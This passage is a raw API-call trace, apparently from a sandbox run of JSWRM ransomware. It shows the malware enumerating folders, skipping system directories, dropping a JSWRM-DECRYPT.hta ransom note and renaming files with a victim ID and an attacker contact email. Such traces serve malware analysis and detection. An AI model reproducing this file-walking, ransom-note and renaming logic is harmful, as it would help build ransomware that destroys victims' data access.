lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.169] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.169] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10086026322368968) returned 0 [0068.169] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.170] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.170] CloseHandle (hObject=0xffffffff) returned 1 [0068.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0068.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0068.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0068.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0068.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0068.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.170] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0068.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.171] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ceb7f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2=".") returned 1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="..") returned 1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="...") returned 1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="windows") returned -1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="recovery") returned -1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="perflogs") returned -1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="documents and settings") returned 1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="$RECYCLE.BIN") returned 1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="system volume information") returned -1 [0068.171] lstrcmpiW (lpString1="osknumpad", lpString2="msocache") returned 1 [0068.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0068.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0068.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0068.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\jswrm-decrypt.hta")) returned 0xffffffff [0068.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0068.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0068.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0068.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0068.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.172] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.172] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.173] CloseHandle (hObject=0x458) returned 1 [0068.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0068.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0068.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\jswrm-decrypt.hta")) returned 0x20 [0068.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0068.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.175] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ceb7f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4b0f4f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231f80 [0068.175] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.175] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ceb7f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4b0f4f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.176] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.176] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.176] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f4b0f4f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f4b0f4f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f4b0f4f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.176] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.176] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x73d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0068.176] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2=".") returned 1 [0068.176] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="..") returned 1 [0068.177] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="...") returned 1 [0068.177] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="windows") returned -1 [0068.177] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="recovery") returned -1 [0068.177] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="perflogs") returned -1 [0068.177] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="documents and settings") returned 1 [0068.177] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.177] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="system volume information") returned -1 [0068.177] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="msocache") returned 1 [0068.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknumpadbase.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknumpadbase.xml", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknumpadbase.xml", lpUsedDefaultChar=0x0) returned 17 [0068.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknumpadbase.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknumpadbase.xml", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknumpadbase.xml", lpUsedDefaultChar=0x0) returned 17 [0068.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.178] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9564342414460936) returned 0 [0068.178] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.178] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.178] CloseHandle (hObject=0xffffffff) returned 1 [0068.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0068.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0068.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0068.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0068.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x21b710 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.179] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21b710 | out: hHeap=0x1e0000) returned 1 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.179] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x73d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 0 [0068.179] FindClose (in: hFindFile=0x231f80 | out: hFindFile=0x231f80) returned 1 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.179] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0068.179] lstrcmpiW (lpString1="osknumpad.xml", lpString2=".") returned 1 [0068.179] lstrcmpiW (lpString1="osknumpad.xml", lpString2="..") returned 1 [0068.179] lstrcmpiW (lpString1="osknumpad.xml", lpString2="...") returned 1 [0068.179] lstrcmpiW (lpString1="osknumpad.xml", lpString2="windows") returned -1 [0068.179] lstrcmpiW (lpString1="osknumpad.xml", lpString2="recovery") returned -1 [0068.180] lstrcmpiW (lpString1="osknumpad.xml", lpString2="perflogs") returned -1 [0068.180] lstrcmpiW (lpString1="osknumpad.xml", lpString2="documents and settings") returned 1 [0068.180] lstrcmpiW (lpString1="osknumpad.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.180] lstrcmpiW (lpString1="osknumpad.xml", lpString2="system volume information") returned -1 [0068.180] lstrcmpiW (lpString1="osknumpad.xml", lpString2="msocache") returned 1 [0068.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknumpad.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 